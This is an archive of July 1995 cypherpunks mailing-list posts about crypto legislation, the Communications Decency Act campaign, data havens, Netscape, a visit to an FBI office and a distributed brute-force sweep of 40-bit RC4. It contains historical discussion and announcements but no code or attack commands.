> \  / ~/ |\| | | |> |  : : : : : : Vladimir Z. Nuri : : : : <vznuri@netcom.com>
>  \/ ./_.| | \_/ |\ | : : : : : : ftp://ftp.netcom.com/pub/vz/vznuri/home.html
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Wed, 19 Jul 95 14:51:48 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <199507140629.XAA21600@ix3.ix.netcom.com>
Message-ID: <Pine.BSD/.3.91.950719173416.21971E-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995, Bill Stewart wrote:

> >Eh, what do "virus hackers" have to do with encryption, why is it these 
> >morons justify the destruction of encryption by mentioning hackers and 
> >viruses?
> 
> You're parsing the title wrong.  It's an act to support racketeering
> through opposition to electronic communications.  What viruses have to
> do with encryption is that encryption makes it easier to prevent viruses,
> and Senator Grassley wants to stop that.  And the term "strong" was used in its
> correct engineering meaning, as in "It's a vessel of fertilizer which is
> very strong and promotes growth".

Erm, not quite.  Stealth viruses supposedly use "encryption" to hide 
themselves, but then, I shouldn't mention this, might give El Federale a 
bit more fuel to burn us with.  (But even these beasts can be caught 
easily if you know how... i.e. create a large executable that does 
nothing but quit to the operating system.  Run it every day and compare 
it every day.  The day it changes is the day a virus infected it.)

Still, you could write beneficial viruses, or virus like programs that 
are beneficial in nature in some way. KOH for instance?

However, none of the above has any iota of anything to do with linking 
the four horsemen of LEA's to crypto in any real-life-already-proven 
situation in any significant numbers.  Banning crypto for EVERYONE in 
order to catch maybe, what, two zit-bearing kids hoarding beaver shots 
downloaded from alt.bin.erotica.pix a year is a tremendous loss of 
everyone's privacy.

> Hey, Julf, we've got your number!  And we're making sure nobody's got any
> encryption to prevent fraud with.

Hell, at this point, my guess is that the mafia(s) doesn't use crypto, or 
that if it does, it can be caught via other means.  A strong, well 
developed crypto system in use by the mafia would more than likely never 
happen... not until mobsters get into computers.  Ditto for terrorists.

If they did use crypto, I suspect they wouldn't get caught.  (For the 
paranoid, assuming they used crypto, and they didn't get caught, then the 
FBI or other TLA is doing the same as the gov't in Farenheight 451... 
pick someone else, and jail them.  Otherwise, how do you explain all the 
jailbird mobsters?)

To LEA's out there:  Get a life, get off the net and go bust some 
murderers.  Stop attacking easy targets.  Do your jobs.  Confront the 
real criminals.  What's the matter?  Is it easier to go after crypto 
geeks than it is to arrest drug dealers who shoot back?

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Gate <gate@id.WING.NET>
Date: Wed, 19 Jul 95 14:51:12 PDT
To: snet-l@world.std.com
Subject: Investigate Your Federal Building :)
Message-ID: <Pine.3.89.9507191717.A8562-0100000@dialin1.wing.net>
MIME-Version: 1.0
Content-Type: text/plain


Had problems with the original transmission...

21:22 EST
July 17th, 1995
New Haven, CT

Day One, Investigation Begins.

	Of course, I've been researching THE FACTS all my life, but never 
before have I gone to the FBI to ask for information.

	Also of course, they gave me none, or practically none, just this:

	(202) 324-3000. Can anyone guess? FBIHQ it says on the yellow 
post-it note. That's all she could give me.

	I have been incredibly scared these last couple of days, 
wondering exactly what I was doing, but I feel better this evening. Just 
going down to the Federal Building and poking around asking questions has 
not gotten me killed, and I don't think it will. Check.

	In a recent post to this list I said I was going to go to the 
Federal Building here in New Haven to begin a local investigation of 
Federal Events.

	So I put on my coat and tie, washed up a little (long-hair and 
beard couldn't be controlled, will not cut) and started walking, stopping 
off at Kinko's Copies to make a free local phone call to one of my 
partners and grab some note paper for the session. Then on across the 
green towards the courthouse, town hall and on Orange Street, the Robert 
N. Giaimo (sp) Federal Building.

	Of course, I'd been there before, to the post office, and it was 
always a rather non-descript affair. But now I was looking for something, 
and though I didn't find what I was looking for, I did find out a lot. 
Alot of it was disturbing, alot of it was funny, and alot of it was 
encouraging, especially the print of the original Declaration and 
Constitution/Bill of Rights, as well as the posted Code of Ethics for 
Government Service, Public Law 96-303, passed unanimously in Congress on 
June 27, 1980, signed by the President (Carter?) on July 3, 1980:

	Article One of Ten: "Put loyalty to the highest moral principles 
and to country above loyalty to persons, party or Government department." 

	No problem, I thought, I'll keep that in mind.

	Article 9: "Expose corruption wherever discovered."

	Whoa, that's a tough one, where are you going to find corruption 
in the United States of America?

Article 11:"Uphold the Constitution, laws and regulations of the United 
States and all governments therein and never be a party to their evasion."

	Well, the Constitution I can uphold, as it upholds me, but I 
don't know about all the other laws and regulations...I'm not sure 
everything signed since 1776 passes my muster. You?

	But though I had been to the Federal Building several times 
previously, I wasn't ready for what I encountered this time, as it had 
never before been present: heavy security presence. No secret service 
types, just rent-a-cops with a metal detector and baggage x-ray device. 
But they were bustling, somewhat loud, and definitely a presence.

	A humorous note: Usually the electro-magnetic energy that I 
generate because of meditation and honest emotional presence is enough to 
kick the metal detectors, but I thought if I took my belt off, I could 
get through. No such luck, and when I took my belt off, my pants, which 
were bought for my bigger brother, started to fall off. I don't wear 
underwear either, so I ended up walking through security holding my 
breeches up by hand. I thought, mmm the joy of security...of course, it 
was *my* costume (cover) that was falling apart, but I got back together 
without real embarassment.

	That's when I started to look around the building lobby. First I 
checked the directory. Yup, there it was, FBI, fifth floor, right 
underneath the penthouse cafe. BATF on the second floor, IRS third. 
Department of Protective Service (SS) first floor, though I saw no 
evidence of their lair or personnel. Bill Clinton and Al Gore on the 
wall, of course...Recycling bins for paper, cans, bottles and something 
else, perhaps newpapers. Nice touch I thought, it would be nice to see 
more of those.

	I wandered over to the bulletin board: 

	Arson informants offered rewards
$100,000 to $250,000 rewards offered to informers leading to convictors 
of international terrorists - mostly airplane and boat hijackers.
The Code of Ethics for Government Service as mentioned above.
Help for choking victims...

(At this time, I was rushed by the closing of the computer center. The 
facts are flear though...)

	Anyway, on to greater heights...
	Elevator, fifth floor, get in, man there, looks like FBI, look at 
numbers in elevator, 5 already lit. A real live FBI agent and I in the 
elevator together, wow. Day already made, still only ten o'clock or so. 
Get off 5th floor. Man goes one way, I go another, meet another real live 
FBI guy,

	 "Where's the receptionist?" 

	"Through that door" came the warm reply from a brown-suited man
with a pock-marked face. Hmm, definitely FBI. 

	Into FBI visitor center, one small room, bulletproof glass, Time 
magazines, American Flag with gold tassels in corner, photos of Agents, 
woman behind the counter:

	"Uh, I'm something of a freelance reporter for Citizen's Television
and Internet newsgroups, and I'd like to know if you can confirm whether
or not someone worked for the FBI..."
	Polite no from FBI woman.
	"Is there a public information office?"
	No, then checks mind, goes to back to talk with all male 
contingent, at least seven agents in back room, including the one I saw 
on the elevator, all are rustled into alert by the inquiry from CTV 
producer and Searchnet Reporter. I can just hear them saying, by gosh 
they were right, the Internet really is spawning investigators...
	
	Then all I get back is the phone number, but it was a lot of fun. 
	
	Down to the BATF? nah, enough for the day.
	
	Thoughts on the way to the library...
	
	Next time, maybe I'll deliver a message. Gotta run, Lee.

____________________________|||||||||||||||||||||______________________________
		 R. Leland Lehrman@The Gate, New Haven, CT.     	    
		    http://id.wing.net/~gate/gate.html
	  God, Art, Technology and Ecology Research and Development
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>Do you love the Mother?>>>>>>>>>>>>>>>>>>>>>>>>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Wed, 19 Jul 95 15:06:39 PDT
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <Pine.SUN.3.91.950713175807.25319A-100000@rwd.goucher.edu>
Message-ID: <Pine.BSD/.3.91.950719174435.21971F-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995, Jon Lasser wrote:

> How about "not respecting international copyright law, and not having 
> extradition treaties with the US" ... set up a data haven, we now know 
> why we need it soon... charge by the Kbyte, automate the billing, and relax.

Seriously bad for my financial health.  I write code for a living (though 
I'm a Netware LAN Admin in this incarnation of a job.)  Going somewhere 
where I can't make money writing code because 10 billion folks will have 
it after one pays is my idea of jumping out of the microwave oven into 
the boiling lobster stew.  :-)

If such systems would be maintenance free, it would be cool going around 
place to place installing data heaven servers all over the place.

Hell a 1Gb hard drive is only $350 or so.  A cheap XT, or lap top hooked 
upto such a drive, say 4Mb of RAM and a 28.8Kbps modem would be good enough.
Say some junky assed machine no more than $500 a pop...

I would guess we could get a small enough package to hide in say... under 
the subway tunnels, or in the sewer system, and hook'em up to existing 
power lines....  Now if we could hook'em up to a phone line easily, it 
would be a great thing to have.  But how do you hook into the phone line 
without the local MaBell getting interested?

Enough of these things hooked up all over the place would be cool.  
Everyone can ftp to the server, write or read, but nobody can delete.  
When the drive is full, the server goes read only.   Instant (free) data 
heaven.  Get a few million of these up, and hey, you've got instant, 
unstopable info servers.  Very hard for any government to catch all of these.

On the other end of el-spectrum d'data heaven is the pay service.  You 
upload, you pay $5 a meg, I burn your megs on the CD.  You want the data 
back, you pay me $50 a meg and I make it available again.  :-) You'll be 
rolling in cash in no time.  I don't need to know who you are or what 
files you sent me.  Just tell me the date and time stamp of the file my 
server got your file and after I get the $50, you get to download the file.

Pay me in cash, e-cash, or no-name money-orders. :-)

Excellent business, no?  Hell, you could probably set something like this 
up in the USA right now...  Even more easily with a 1-900-$5/minute number.
As long as what you send me is something I can't see, I don't have any 
risk and neither do you.  Or you can snail mail me a 1.44Mb floppy with a 
special file name and I'll take the post_mark date and the file name and 
your $5 and burn it on the CD.

Expensive enough to keep pirates away, cheap enough to make corporate 
data worth backing up remotely.

Cost: ~$10K or so...

 Good pentium server running Linux $2K, 28.8Kbps modems ~$220
 each, need no more than 2Gb of hard drive space... (650 of which you set 
aside for the CD burning.)
 CD Burner ~$1700.
 blank CD's for $8 a piece in volume, etc.

 Good sized data-grade fire proof safe $????

You can hire high school kids to burn the CD's in or your relatives, or 
do it yourself.  Very nice setup.

=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@escape.com>
Date: Wed, 19 Jul 95 15:28:04 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: EVENT: NY-only, non-NY folks ignore (fwd)
Message-ID: <Pine.BSD/.3.91.950719182104.21971L-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain




=================================================================93=======
 + ^ + |  Ray Arachelian | Amerika: The land of the Freeh. | \-_    _-/  |
  \|/  |sunder@escape.com| Where day by day, yet another   |  \  --  /   |
<--+-->|                 | Constitutional right vanishes.  |6 _\-  -/_  6|
  /|\  |    Just Say     |                                 |----\  /---- | 
 + v + | "No" to the NSA!| Jail the censor, not the author!|     \/      |
=======/---------------------------------------------------------VI------/
      /  I watched and weeped as the Exon bill passed, knowing that yet /
     / another freedom vanished before my eyes.  How soon before we see/
    /a full scale dictatorship in the name of decency? While the rest /
   /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/

---------- Forwarded message ----------
Date: Tue, 18 Jul 1995 01:12:41 -0400 (EDT)
From: She Devil With A Modem! <redsonja@computel.com>
To: sunder@escape.com
Subject: EVENT: NY-only, non-NY folks ignore (fwd)

Also Sprach Shabbir J. Safdar:
>From shabbir@panix.com Mon Jul 17 23:51:37 1995
Date: Mon, 17 Jul 1995 23:45:32 -0400
From: "Shabbir J. Safdar" <shabbir@panix.com>
Message-Id: <199507180345.XAA05923@panix3.panix.com>
To: stop314@panix.com
Subject: EVENT: NY-only, non-NY folks ignore

======================================================================

	Campaign to stop the 1995 Communications Decency Act

		  	FREE NEW YORK WORKSHOP

	    We encourage you to forward this to friends
	     DO NOT REDISTRIBUTE AFTER July 22, 1995

______________________________________________________________________
WORKSHOP DETAILS

What: 	A free workshop on current online censorship legislation and
      	the viable alternatives.
When: 	Saturday July 22nd, 1-4pm
Where: 	ACLU offices at Times Sq (132 West 43rd St at 6th Ave)
Who:	Everyone (teachers, librarians, businesses, everyone!)
Agenda:	
  Crash Course on the First Amendment and the New Censorship Legislation 
  Questions and Answers About How the CDA Affects You and Your Business 
  How to Lobby Your Representative 
  Plans for the New York Lobby Day Against the CDA:  Wednesday, July 26th 

______________________________________________________________________
WHY YOU SHOULD ATTEND THE WORKSHOP

Are you interested in seeing our government become less intrusive, not
larger, and less involved in personal decisions about what you read?

Do you believe that Constitutionally-protected speech should not be
regulated by the FCC (or any other Federal agency)?

Do you believe that computer networks are a tremendously powerful tool
for giving many more people in our society a voice, bypassing traditional
forms of media?

If you find the above three questions compelling, you should be
concerned about the 1995 Communications Decency Act (CDA).  Having
already passed the Senate, the CDA is headed for the House and has
favorable odds of passing there as well if nothing is done.

The CDA was passed by the Senate 84-16.  It was voted on by many
legislators who not only never use a computer, but have never read
email, logged onto a BBS, read Usenet news, or seen a Web page.  They
were simply voting with their gut reaction, unaware that they were
disastrously affecting the future of American expression and the
most explosive industry seen in the last ten years.

It *doesn't* have to be that way.  We as New Yorkers can't expect our
elected officials to vote out of a vacuum.  We need to tell our
Representatives that online systems are a new medium, not the same as a
telephone, nor the same as television.  They need to understand that
the Internet and bulletin boards aren't simply Dial-A-Porn lines, or
adult cable channels.

However they won't come to these conclusions themselves; they need your
help.  Come to this free workshop and learn what you can do to help
ensure that online communication isn't restricted unreasonably.

_______________________________________________________________________
SUPPORTING ORGANIZATIONS

American Civil Liberties Union, College Art Association, Creative
Coalition, Feminists for Free Expression, and the Voters
Telecommunications Watch 

_______________________________________________________________________
FOR MORE INFORMATION

For more information about the CDA Workshop on July 22nd, contact: 
 
  Shabbir Safdar, Voters Telecomm Watch 
      Email: vtw@vtw.org
      (718) 596-7234
  Ann Beeson, American Civil Liberties Union 
      Email: beeson@aclu.org 
      (212) 944-9800 x788 

For more information about the CDA, see:
  
Web Sites
        URL:http://www.panix.com/vtw/exon/

Gopher Archives:
        URL:gopher://gopher.panix.com/11/vtw/exon

Email:
        vtw@vtw.org (put "send cdafaq" in the subject line)

________________________________________________________________________
LIST OF PARTICIPATING ORGANIZATIONS

In order to use the net more effectively, several organizations have
joined forces on a single Congressional net campaign to stop the
Communications Decency Act.


American Civil Liberties Union * American Communication Association *
American Council for the Arts * Arts & Technology Society * Association
of Alternative Newsweeklies * biancaTroll productions * Californians
Against Censorship Together * Center For Democracy And Technology *
Centre for Democratic Communications * Center for Public Representation
* Citizen's Voice - New Zealand * Computer Communicators Association *
Computel Network Services * Computer Professionals for Social
Responsibility * Cross Connection * Cyber-Rights Campaign * CyberQueer
Lounge * Dutch Digital Citizens' Movement * Electronic Frontier Canada
* Electronic Frontier Foundation * Electronic Frontier Foundation -
Austin * Electronic Frontiers Australia * Electronic Frontiers Houston
* Electronic Frontiers New Hampshire * Electronic Privacy Information
Center * Feminists For Free Expression * First Amendment Teach-In *
Florida Coalition Against Censorship * FranceCom, Inc. Web Advertising
Services * Friendly Anti-Censorship Taskforce for Students * Hands Off!
The Net * Human Rights Watch * Inland Book Company * Inner Circle
Technologies, Inc. * Inst. for Global Communications * Internet
On-Ramp, Inc. * Joint Artists' and Music Promotions Political Action
Committee * The Libertarian Party * Marijuana Policy Project *
Metropolitan Data Networks Ltd. * MindVox * National Bicycle Greenway *
National Campaign for Freedom of Expression * National Coalition
Against Censorship * National Gay and Lesbian Task Force * National
Public Telecomputing Network * National Writers Union * Oregon Coast
RISC * Panix Public Access Internet * People for the American Way *
Rock Out Censorship * Society for Electronic Access * The Thing
International BBS Network * The WELL * Voters Telecommunications Watch

(Note: All 'Electronic Frontier' organizations are independent entities,
 not EFF chapters or divisions.)

________________________________________________________________________
	End Alert
========================================================================


-- 
                                    ()()()()()  
   All that matters is that  ]{      |BTCOMH|-| Eileen Tronolone
 -===========================]*\\\{O | (tm) | | System Administrator
   two stood against many... ]{      |______|-/ redsonja@computel.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shabbir@panix.com
Date: Wed, 19 Jul 95 15:27:23 PDT
To: Paul Elliott <paul.elliott@hrnowl.lonestar.org>
Subject: Re: Why no action alert, coalition opposing S. 974?
In-Reply-To: <300d66d0.flight@flight.hrnowl.lonestar.org>
Message-ID: <199507192226.SAA10293@panix4.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



S 974 is a silly bill.  It's like someone went around and made a list
of all the things that would irk us and then wrote legislation
around it.

However this bill isn't immediately going anywhere, and there's more
dangerous legislation on the floor that is looking a lot like a loaded
gun.

VTW is tracking this bill and will put out alerts on it if it becomes
a more valid threat.  However until then we'll not try to divide the
forces of the net on bills that aren't yet a serious threat.

Read the bill, familiarize yourself with the analyses, but let's not
go running off every time some DC bozo writes a terrible bill.  Especially
when there isn't even a subcommittee hearing scheduled yet.

Let's try and do *one thing* at a time.

-Shabbir

In message <300d66d0.flight@flight.hrnowl.lonestar.org>, Paul Elliott writes:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>I have read the EFF analysis of Senate bill 974, which is designed to
>inhibit encryption on Networks. I think that it is a thoughtful document
>but I am concerned that there has been no action alert produced to tell
>people the most effective way to oppose this horrible Bill. People
>who are concerned about the bill need to know what Senators could most
>profitably be contacted. Also why has no coalition been formed to oppose
>this bill? I am aware that many people are busy opposing S314, but
>S974 is equally terrible as it attempts to suppress free expression.
>
>I could try to produce an action alert myself, but I would probably make
>errors as I am not up on the legal subtleties and the intricacies of
>Congress. Could some of the savvy people please write an action alert?
>Otherwise I will be forced to take a stab at it.
>
>- -- 
>Paul Elliott                                  Telephone: 1-713-781-4543
>Paul.Elliott@hrnowl.lonestar.org              Address:   3987 South Gessner #2
>24
>                                              Houston Texas 77063
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6
>
>iQCVAgUBMA10YfBUQYbUhJh5AQFMBAQAgUJAj1nNdG54IxIFAboCw+Q/E8WWOvEO
>9Aazj9hjHK7VeHi+vpTY7eJRbQq7LyQq/ex41PE+QXu+mjWe3c1si8HmhherA22i
>CUGv3UI8L/Z43zLtN2TI9reJsizeYnmHlO3uUffP3vnhwBJm1G7EAlXvKFqikC90
>q1DUqqgq7k4=
>=4yQ7
>-----END PGP SIGNATURE-----
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Wed, 19 Jul 95 18:56:27 PDT
To: Ray Arachelian <jlasser@rwd.goucher.edu>
Subject: Data Havens and Intellectual Property
Message-ID: <ac330394020210046d40@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Ahh, a meaty subject at long last!

At 9:59 PM 7/19/95, Ray Arachelian wrote:
>On Thu, 13 Jul 1995, Jon Lasser wrote:
>
>> How about "not respecting international copyright law, and not having
>> extradition treaties with the US" ... set up a data haven, we now know
>> why we need it soon... charge by the Kbyte, automate the billing, and relax.
>
>Seriously bad for my financial health.  I write code for a living (though
>I'm a Netware LAN Admin in this incarnation of a job.)  Going somewhere
>where I can't make money writing code because 10 billion folks will have
>it after one pays is my idea of jumping out of the microwave oven into
>the boiling lobster stew.  :-)

Agreed, things may be rough for the folks profiting from the current
intellectual property laws. But many nations don't agree with our notions
of what is one's intellectual property.

("Galombosians" believe one's _ideas_ are one's property, subject to
collection of fees. "You mentioned "remailers"...please remit $1.33
to....")

>If such systems would be maintenance free, it would be cool going around
>place to place installing data heaven servers all over the place.
>
>Hell a 1Gb hard drive is only $350 or so.  A cheap XT, or lap top hooked
>upto such a drive, say 4Mb of RAM and a 28.8Kbps modem would be good enough.
>Say some junky assed machine no more than $500 a pop...

I think you're making the point: machines on the Net are getting much, much
cheaper, which will make "Mom and Pop remailers" much more common.

Importantly, these remailers will be common--someday, if not this year--in
non-U.S. jurisdictions.

The growth of Net and Web services has been astounding, even to me (someone
whose first Arpanet account was in 1973). This will put Cypherpunks
services into many more places.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Wed, 19 Jul 95 19:10:06 PDT
To: cypherpunks@toad.com
Subject: Netscape the Big Win
Message-ID: <ac330625030210040787@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Here is my experience with the last month of heavily using Netscape (1.1N),
after several years of using a mix of Unix-based tools on a Unix shell
account at Netcom (and several years of using Portal before that, beginning
in 1988).

(And intermittent Net use from 1973, when I had a very primitive account in
college at UC Santa Barbara, on the "Arpanet," to the mid-80s, when I had
various accounts while still at Intel.)

* I use Netscape to read News.

* I use Netscape to access the Web.

* I still use Eudora to send and receive Mail. (Netscape can currently send
mail, but not receive it. This is likely to change soon.)

Why is this important?

I believe, quite strongly, that we are headed toward a situation where the
large majority of Net/Web users are using some variant of Netscape, or
Mosaic/MacWeb/etc. (but probably Netscape, for various reasons).

Integration of crypto into Netscape is thus the Big Win.

I felt this was the case as far back as last fall, but my recent
experiences tell me this is more important than ever. Integration of PGP
and other crypto routines into Tin, Pine, Elm, Joe, Emacs, etc., is just
not as important.

IBM just paid nearly $3 billion for Lotus, largely for the "common
platform" of Lotus Notes. I believe Netscape is an even more important
common platform, and will displace Notes.

I have been asked many times by various of you about investments, as I've
been making my living the past decade through investments. The message here
is my strongest statement about what to invest in.

(I'm not saying one has to stand in line for the August IPO of Netscape
Communications, but the overall market will favor the Web browsers,
especially Netscape.)

The relevance for Cypherpunks interested in writing code is that, in my
carefully considered opinion, writing for Netscape and other Web browsers
is the Big Win. Even over Windows (except Windows browsers, of course).

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Wed, 19 Jul 95 11:32:29 PDT
To: cypherpunks@toad.com
Subject: ANNOUNCE: bruteRC4, 40 bits all swept
Message-ID: <29518.9507191827@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Well we have demonstrated that 40 bit RC4 can be brute forced in
around a weeks compute time.

(We've also learned a list of thinks to fix for the next attempt as no
key was forthcoming :-|, details on why not and what is being fixed to
ensure this doesn't happen with a future RC4-40 or with the coming
40+88 SSL brute forceing are given below)

The problems are logistic, human error, etc, from a compute time point
of view it *really* was a full sweep of a 40 bit keyspace.  And on
average you would expect to sweep in half this time.

The bulk of the work was done in under one weeks compute time, but
problems with people forgetting to acknowledge what they swept, meant
that 3 or 4 people swept the remaining key space over, which slowed
down this announce.

Here's the hall of fame, for bits/percentage swept per identifiable
contributer (this is tallied by acknowledgement, if you swept but did
not acknoweldge quickly enough or at all, that work won't show as the
last keyspace was re-swept to hurry things up.  The first
acknowledgement to be recieved counts, the rest get ignored).

bits/40   percent  contributer
----------------------------------------------------------------------
37.2 bits (14.063%) Jon Shekter <jshekter@alias.com>
36.4 bits (8.081%) Alvin Brattli <alvin@phys.uit.no>
36.1 bits (6.909%) anonymous
36.1 bits (6.836%) Dan Bailey <merzbow@ibm.net>
36.1 bits (6.812%) Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
35.6 bits (4.688%) Loren Rittle <rittle@comm.mot.com>
35.6 bits (4.663%) Adam Back <aba@dcs.ex.ac.uk>
35.4 bits (4.102%) Eric Young <eay@mincom.oz.au>
35.4 bits (4.004%) Fred <admin@dcwill.com>
35.3 bits (3.809%) Martin Hamilton <martin@mrrl.lut.ac.uk>
35.2 bits (3.711%) Kevin Wang <kwang@blackbox.punk.net>
35.0 bits (3.125%) Richard Martin <rmartin@alias.com>
34.7 bits (2.490%) Dan Oelke <droelke@aud.alcatel.com>
34.3 bits (1.978%) Branko Lankester
34.0 bits (1.611%) Simon McAuliffe <sai@comp.vuw.ac.nz>
34.0 bits (1.562%) Mike Gebis <m-gebis@uiuc.edu>
33.8 bits (1.392%) Pat Finerty <zinc@zifi.genetics.utah.edu>
33.8 bits (1.367%) <hodgeman@csd.uwm.edu>
33.5 bits (1.123%) Panu Rissanen <Panu.Rissanen@lut.fi>
33.4 bits (1.001%) Paul Bell <pjb@23kgroup.com>
33.3 bits (0.977%) Matt Thomlinson <phantom@u.washington.edu>
33.3 bits (0.952%) Will Kinney <kinney@colorado.edu>
33.2 bits (0.903%) T J Hardin <hardin@cyberspace.com>
33.2 bits (0.879%) Patrick May <pjm@ionia.engr.sgi.com>
32.8 bits (0.684%) Stephane Bortzmeyer <bortzmeyer@cnam.fr>
32.7 bits (0.635%) anonner
32.5 bits (0.537%) Matt Pauker <mpauker@peganet.com>
32.5 bits (0.537%) Ed Kern <ejk@digex.net>
32.5 bits (0.537%) Andrew Kuchling <andrewk@cst.ca>
32.5 bits (0.537%) <rmtodd@mailhost.ecn.uoknor.edu>
32.4 bits (0.513%) <somogyi@digmedia.com>
32.3 bits (0.488%) Jon Baber <jbaber@mi.leeds.ac.uk>
32.2 bits (0.439%) Bryce Boland <bryce@cybernet.co.nz>
32.0 bits (0.391%) Thad Beier <thad@thresher.uucp.netcom.com>
32.0 bits (0.391%) Per Stoltze <stoltze@fysik.dtu.dk>
32.0 bits (0.391%) Glenn Powers <gpowers@bradley.edu>
32.0 bits (0.391%) <janzen@idacom.hp.com>
31.8 bits (0.342%) Mike Bailey <bailey@computek.net>
31.7 bits (0.317%) Robert Hayden <hayden@krypton.mankato.msus.edu>
31.7 bits (0.317%) John Limpert <johnl@radix.net>
31.6 bits (0.293%) Opus
31.6 bits (0.293%) Mark Rogaski <rogaski@phobos.lib.iup.edu>
31.6 bits (0.293%) <josh@silicon.net>
31.5 bits (0.269%) Michael Bacon <mbacon@dfw.net>
31.3 bits (0.244%) Jim Gillogly <jim@acm.org>
31.3 bits (0.244%) David Zuhn <zoo@armadillo.com>
31.2 bits (0.220%) Russell Ross <rross@sci.dixie.edu>
31.2 bits (0.220%) Don Kitchen <don@cs.byu.edu>
31.0 bits (0.195%) Scott Renfro <csylvix!srenfro@cuok.cameron.edu>
31.0 bits (0.195%) Planar <Damien.Doligez@inria.fr>
30.8 bits (0.171%) Matt <panzer@dhp.com>
30.8 bits (0.171%) Joe Thomas <jthomas@access.digex.net>
30.8 bits (0.171%) Adrian Thomson <a.thomson@nexor.co.uk>
30.6 bits (0.146%) Michael Axelrod <mja@cacs.usl.edu>
30.6 bits (0.146%) Mark Eichin <mark@kitten.gen.ma.us>
30.6 bits (0.146%) Jason Burrell <jburrell@crl.com>
30.3 bits (0.122%) Will Ware <wware@world.std.com>
30.3 bits (0.122%) Kevin Maher <kmaher@ucsd.edu>
30.3 bits (0.122%) Josh Sled <jsled@cello.gina.calstate.edu>
30.3 bits (0.122%) Checkered Daemon <cdaemon@goblin.punk.net>
30.3 bits (0.122%) Andrew Roos <andrewr@realtime.co.za>
30.0 bits (0.098%) Jason Weisberger <jweis@primenet.com>
30.0 bits (0.098%) <pdlamb@iquest.com>
30.0 bits (0.098%) <matt@comp.vuw.ac.nz>
29.6 bits (0.073%) Mark Grant <mark@unicorn.com>
29.6 bits (0.073%) Lou Poppler <lwp@mail.msen.com>
29.6 bits (0.073%) Edwin de Graaf <graaf@iaehv.nl>
29.6 bits (0.073%) David Conrad <conrad@detroit.freenet.org>
29.6 bits (0.073%) Dan Tauber <dat@netcom.com>
29.6 bits (0.073%) Alexandra Griffin <acg@kzin.cen.ufl.edu>
29.6 bits (0.073%) <pkronenw@erc.cat.syr.edu>
29.6 bits (0.073%) <ghazelwo@cs.oberlin.edu>
29.0 bits (0.049%) Stuart <stu@nemesis.wimsey.com>
29.0 bits (0.049%) Pekka Riiali <Pekka.Riiali@lut.fi>
29.0 bits (0.049%) Jeffrey Ollie <jeffo@noc.netins.net>
29.0 bits (0.049%) James Hightower <jamesh@netcom.com>
29.0 bits (0.049%) Hadmut Danisch <danisch@ira.uka.de>
29.0 bits (0.049%) Bob Snyder <rsnyder@janet.advsys.com>
29.0 bits (0.049%) <stevet@smeg.net4.io.org>
28.0 bits (0.024%) Sang Hahn <sghahn@math1.kaist.ac.kr>
28.0 bits (0.024%) Roy Silvernail <roy@cybrspc.mn.org>
